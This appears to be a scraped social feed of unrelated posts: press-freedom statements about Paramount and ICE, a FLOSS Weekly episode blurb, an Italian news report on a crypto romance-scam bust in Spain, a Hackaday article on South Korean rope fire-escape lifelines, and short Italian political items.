But we are not done fighting. We’ve already filed a shareholder information demand and are sending a second demand today to uncover information about this decision. With that information, we will continue to pursue our legal options to stop this affront to Paramount shareholders, CBS journalists, and the First Amendment. Paramount directors should be held accountable and we will do all we can to make that happen.

FPF is a Paramount Global shareholder, and you can read our letter notifying Paramount of our plans to take legal action in the event of a settlement with Trump here. You can read a previous statement from our counsel here, and our recent demand for information to which we are entitled as shareholders here.

Please contact us if you would like further comment.


freedom.press/issues/paramount…

Alessio reshared this.



Presentazione del libro “A cosa serve il ricordo” di Andrea Apollonio

@Politica interna, europea e internazionale

2 luglio 2025, ore 18:00, Fondazione Luigi Einaudi, Via della Conciliazione 10, ROMA Oltre all’autore interverranno Giuseppe Benedetto, Presidente Fondazione Luigi Einaudi Rocco Gustavo Maruotti, Sostituto procuratore e Segretario ANM Francesco Paolo Sisto, Viceministro




FLOSS Weekly Episode 839: I Want to Get Paid Twice


This week Jonathan chats with benny Vasquez about AlmaLinux! Why is AlmaLinux the choice for slightly older hardware? What is the deal with RISC-V? And how does EPEL fit in? Tune in to find out!


youtube.com/embed/5G-wIcFLrnM?…

Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.

play.libsyn.com/embed/episode/…

Direct Download in DRM-free MP3.

If you’d rather read along, here’s the transcript for this week’s episode.

Places to follow the FLOSS Weekly Podcast:


Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)

Licensed under Creative Commons: By Attribution 4.0 License


hackaday.com/2025/07/02/floss-…



Pig Butchering Scam: Arrestati 5 criminali in Spagna per una frode da 540 milioni di dollari


Le autorità spagnole hanno arrestato cinque persone sospettate di aver riciclato 540 milioni di dollari tramite investimenti illegali in criptovalute e di aver frodato più di 5.000 persone. L’operazione di polizia, denominata Borrelli, è stata condotta con il supporto e il coordinamento dell’Europol, nonché delle forze dell’ordine di Estonia, Francia e Stati Uniti.

Le truffe sugli investimenti in criptovalute vengono solitamente messe in atto tramite la truffa romantica (conosciuta anche come macellazione del maiale), divenuta popolare negli ultimi anni.

Lo schema prevede che i truffatori utilizzino l’ingegneria sociale e contattino persone (“maiali”) sui social media e sulle app di incontri. Col tempo, i criminali si guadagnano la fiducia delle vittime simulando un’amicizia o un interesse romantico, e a volte persino fingendosi amici nella vita reale delle vittime.

Una volta stabilito il “contatto”, a un certo punto i criminali propongono alla vittima di investire in criptovalute, reindirizzando la vittima a un sito web fasullo. Purtroppo, di solito è impossibile recuperare i fondi e ricevere il reddito dichiarato da tali “investimenti“. Di norma, dopo l'”investimento“, i fondi vengono movimentati attraverso numerosi conti, il che li rende estremamente difficili da tracciare.

L’indagine sulle attività del gruppo fraudolento è iniziata nel 2023. Da allora, gli esperti di reati finanziari di Europol hanno assistito le autorità spagnole coordinando le indagini e fornendo supporto operativo. Il giorno dell’operazione, un esperto di criptovalute è stato persino inviato in Spagna per assistere gli investigatori.

Mentre i metodi utilizzati dai criminali sono ancora oggetto di indagine, la polizia afferma di aver ormai compreso il modus operandi del gruppo, che ha spostato e nascosto i fondi rubati attraverso i suoi canali in Asia.

“Per svolgere le loro attività fraudolente, si ritiene che i leader del gruppo criminale si siano avvalsi di una rete di complici in tutto il mondo che raccoglievano fondi tramite prelievi di contanti, bonifici bancari e trasferimenti di criptovalute”, ha dichiarato Europol. “Gli investigatori sospettano che l’organizzazione criminale abbia creato una rete aziendale e bancaria con sede a Hong Kong che utilizzava gateway di pagamento e conti su vari exchange, creati a nome di persone diverse, per ricevere, conservare e trasferire fondi ottenuti tramite attività criminali”.

La dichiarazione di Europol sottolinea specificamente il ruolo dell’intelligenza artificiale nella diffusione delle frodi sugli investimenti, che stanno diventando sempre più sofisticate.

L'articolo Pig Butchering Scam: Arrestati 5 criminali in Spagna per una frode da 540 milioni di dollari proviene da il blog della sicurezza informatica.



La controrivoluzione del presidente


altrenotizie.org/primo-piano/1…


I piloti israeliani hanno sganciato “bombe inutilizzate” su Gaza durante gli attacchi dell’Iran


@Notizie dall'Italia e dal mondo
Ciò spiega le ondate di potenti attacchi aerei sulla Striscia, ben lontana dal fronte iraniano, registrate il mese scorso
L'articolo I piloti israeliani hanno sganciato “bombe inutilizzate” su Gaza durante gli attacchi

reshared this



South Korea Brought High-Rise Fire Escape Solutions To The Masses


When a fire breaks out in a high-rise building, conventional wisdom is that stairwells are the only way out. Lifts are verboten in such scenarios, while sheer height typically prevents any other viable route of egress from tall modern buildings. If the stairs are impassable, or you can’t reach them, you’re in dire peril.

In South Korea, though, there’s another option for escape. The answer involves strapping on a harness and descending down ropes hanging off the side of the building, just like in an action movie. It might sound terrifying, but these descending lifeline devices have become a common part of fire safety infrastructure across the country.

Going Down


The concept is elegantly simple—tall buildings like apartments and hotels feature compact rope escape devices that can be quickly deployed from windows or balconies. These allow people to control their descent down the exterior of a building in the event that there is no other route of escape. While fleeing a building down a rope is typically the preserve of fictional spies or trained climbers, these carefully engineered systems are designed for use by ordinary people in emergency situations.

youtube.com/embed/tboKzq3lx8M?…

The typical Korean descending lifeline comes as a kit with some simple components. It consists of a rope or cable, a friction-based descent control mechanism, and a harness system that can be donned quickly by sliding under the arms and tightening a strap. Deploying the device is relatively simple. The rope reel is attached to a large deployable hook that is firmly mounted to the building’s wall, using a screw-threaded coupling. The rope is then thrown out the window. At this point, the user merely needs to attach the harness and tighten it prior to leaving the building.
A typical lifeline descent kit, manufactured by Kfire. Credit: Kfire
When exiting the window, the user is instructed to face the wall on the way down, using their hands and/or feet to control the descent. Ultimately, though, the mechanical speed regulator ensures a safe pace of descent. The devices only allow the descent of one person at at time. However, each end of the rope has a harness. Thus, when one user has descended to ground level, the next person can grab the harness at the other end which has ascended to the window, and begin their descent. This can continue for as many people as needed.

Key to these devices is their focus on simplicity. The descent control mechanism uses a geared braking system that automatically limit the speed of descent to 1.5 meters/sec or less, preventing the user from descending too quickly even if they panic and release their grip. The lifelines are also sold in a range of different lengths to suit the heights of individual floors in a building. This is important to ensure that as the user hits the ground, the other end of the rope has carried the other harness back up to the floor for the next user. The longest variants typically sold are 45 meters in length, intended for buildings up to 15 stories tall. Limits of practicality mean that while these lifelines are useful for many buildings, they’re perhaps not applicable to taller skyscrapers where such escape would be more difficult.

The engineering challenge here isn’t just mechanical. Automatic rope descent systems are a well understood technology, as are hooks and brackets rated to carry human weight for climbing or otherwise. The real challenge comes down to human factors—in that these systems need to be something people can figure out how to use under conditions of extreme stress. The devices need to be intuitive enough that someone who has never used one before can figure it out while a fire rages behind them. It’s one thing to learn how to use a rope descent system by watching a video and trying the equipment at a calm training session. It’s another thing entirely to do so while a fire rages in the hotel hallway behind you.

While these lifeline systems are relatively simple, they’re still a lot more complicated to use than something like an airliner life jacket. Requiring an inexperienced end user to thread a fitting on a rope coupler without dropping it out the window in a panic situation is a tall ask. Still, the lifelines provide a useful additional escape option. It may not be the easiest way out of the building, or anybody’s first choice, but when there’s no other option, it’s good to have.

South Korea’s adoption of these systems reflects both the country’s high-rise-heavy urban landscape and a pragmatic approach to disaster preparedness. Many apartment buildings and hotels are now required to have these devices installed. The devices are typically mounted in weatherproof boxes near windows or on balconies, ready for deployment when traditional escape routes are compromised. In some cases, the rugged boxes the lifelines come in can even be used as a step-up to ease egress out of higher windows.

Perhaps most importantly, these systems represent a shift in traditional thinking about fire safety. In most jurisdictions, the idea of asking average people to belay down a building is considered untenable—too dangerous and too complicated. In South Korea, the lifelines are on hand, and put control back in the hands of building occupants. When every second counts and traditional escape routes have failed, having a lifeline system could mean the difference between life and death. It’s a sobering reminder that sometimes the best high-tech solution is one that lets people save themselves.



ICE wants to work in secret. We shouldn’t let it


Interested in what Immigration and Customs Enforcement is up to? Step right up to read ICE’s many press releases touting their accomplishments, watch Dr. Phil’s ICE ride-alongs on his new TV network, and, of course, follow ICE on social platform X.

Just don’t expect to read independent reporting about ICE activity — at least not if government officials get their way. Journalists and members of the public who report on ICE are increasingly under attack by officials who would prefer to silence them so government propaganda can fill the information void.

Threatening investigations on spurious grounds

The most recent example is the government’s attack on CNN for its reporting about an app called ICEBlock that alerts users to sightings of ICE agents nearby.

“Border czar” Tom Homan called on the Department of Justice to investigate CNN for its reporting, and Department of Homeland Security Secretary Kristi Noem said her agency is working with the DOJ on a potential prosecution of CNN for “encouraging people to avoid law enforcement activities and operations.”

Press secretary Karoline Leavitt also accused CNN of inciting violence against ICE officers, despite no evidence that ICEBlock, let alone CNN’s reporting on it, has caused any violence.

An app that reports on the presence of law enforcement officers in public isn’t illegal. ICEBlock’s creator told CNN that its purpose is to help people “avoid interactions with ICE,” and many people have legitimate reasons to want to avoid ICE, even if they’re not in the country illegally. At the risk of stating the obvious, journalism about ICEBlock is also legal and protected by the First Amendment.

But none of that has stopped administration officials from making threats, probably with the hope of intimidating CNN and others from reporting on public efforts to counter ICE. They had to have known that their baseless accusations would lead to even more people finding out about ICEBlock. But this isn’t about ICEBlock, it’s about chilling journalism.

Opening baseless investigations

And officials haven’t stopped at just threatening investigations for reporting on ICE. In February, the Federal Communications Commission actually opened an investigation into a California radio station, KCBS, after it reported on ICE raids happening in San Jose.

FCC Chair Brendan Carr said that broadcasting the locations of ICE agents violates FCC rules requiring licensees to operate in the “public interest,” even though such reporting is constitutionally protected. The fact that KCBS is owned by a nonprofit controlled by Democratic megadonor George Soros surely didn’t endear the station to Carr either.

Again, the clear intent of this investigation — and others by the FCC — is to chill news outlets from reporting on ICE and other topics the administration would prefer they avoid. KCBS, for instance, apparently removed the news report on the San Jose raids from its website after the FCC announced its investigation.

Transforming ICE into secret police

Some Republicans in Congress seem to also want in on the secrecy, by turning ICE into the secret police.

In June, Sen. Marsha Blackburn introduced the “Protecting Law Enforcement from Doxxing Act,” a bill that would make it a crime to name a federal law enforcement officer, including ICE officers, in certain circumstances. Sen. Lindsey Graham joined as a co-sponsor of the bill after grandstanding on social media about the need for legislation to prohibit the disclosure of the identities of ICE agents and other federal law enforcement officers.

While Blackburn’s bill requires the “intent to obstruct a criminal investigation or immigration enforcement operation” when naming an ICE officer, that will likely offer little protection when officials are constantly claiming that any public scrutiny of ICE obstructs its work. Those found guilty under the law could be imprisoned for five years.

ICE freezing out transparency

Finally, ICE itself is pushing for more and more secrecy. The agency often refuses or fails to respond to Freedom of Information Act requests, leading news outlets and other requesters to sue. It illegally attempted to curtail congressional visits to ICE facilities, and then apparently quickly and quietly rescinded that guidance.

In May, ICE asked the San Francisco Standard to blur the faces of ICE agents whose pictures were taken in public during an operation at a courthouse. The Standard refused and then reported on the request under the headline, “The ICE agents disappearing your neighbors would like a little privacy, please.”

Last week, ICE agents in New York reportedly harassed journalists attempting to cover immigration court proceedings, including by photographing their press credentials.

Perhaps most disturbingly, ICE is currently attempting to deport Mario Guevara, a journalist known for documenting immigration raids, after he was arrested on unjustified charges while covering a “No Kings” protest in Georgia. Guevara now faces the prospect of being returned to El Salvador, a country he left after receiving death threats for his reporting.

He’s been granted bond, but the government alarmingly argued that his livestreaming of a protest justifies deporting him because he publicized law enforcement activities (which is what journalists are supposed to do).

In addition to using deportations to punish reporting, the administration is also targeting opinion writing. It’s currently attempting to deport Tufts University student Rümeysa Öztürk over an op-ed she co-wrote.

These potential deportations send a chilling message to other journalists who’ve fled to the United States from repressive countries. As one reporter told The New Yorker about Guevara’s case, “Today, it was Mario, but tomorrow it could be any one of us.” And while noncitizen journalists are the easiest targets for now, it’s abundantly clear that the government would like to criminalize journalists it doesn’t like, regardless of the journalists’ residency status.

Yet many journalists — like those at the Standard — are refusing to be chilled. Reporters, many at smaller news outlets, have kept reporting on ICE raids in their communities, often relying on video or photos of ICE agents in public captured by the public and posted on social media—videos that Homan and Leavitt would probably claim should be illegal.

Continuing to report and inform the public is exactly the right response to the government’s attempts to intimidate the press from reporting on ICE. But journalists can’t push back on these chilling tactics alone.

“See something, say something” shouldn’t just be a motto for the security state. When you see these chilling tactics employed by the government against the free press, speak up against it—to other journalists, on op-ed pages and in letters to the editor, to ICE, to your state and local representatives, and to Congress.


freedom.press/issues/ice-wants…



l'eredità di trump. cosa ci lascia trump con la sua presidenza? sostanzialmente macerie. le macerie di un occidente unito, le macerie della democrazia usa, le macerie di un dollaro le forte, le macerie e di un'economia usa, le macerie del ricordo di quello che gli usa hanno sempre cercato di essere, senza riuscirci, a cui hanno definitivamente rinunciato. certo adesso non sono più i poliziotti del mondo, ma un ulteriore elemento di caos e disgregazione. e un'europa che potrebbe diventare più forte e autonoma ed esprimere una propria politica continentale. putin certamente ha da gongolare, ma non p così automatico che vada suo vantaggio.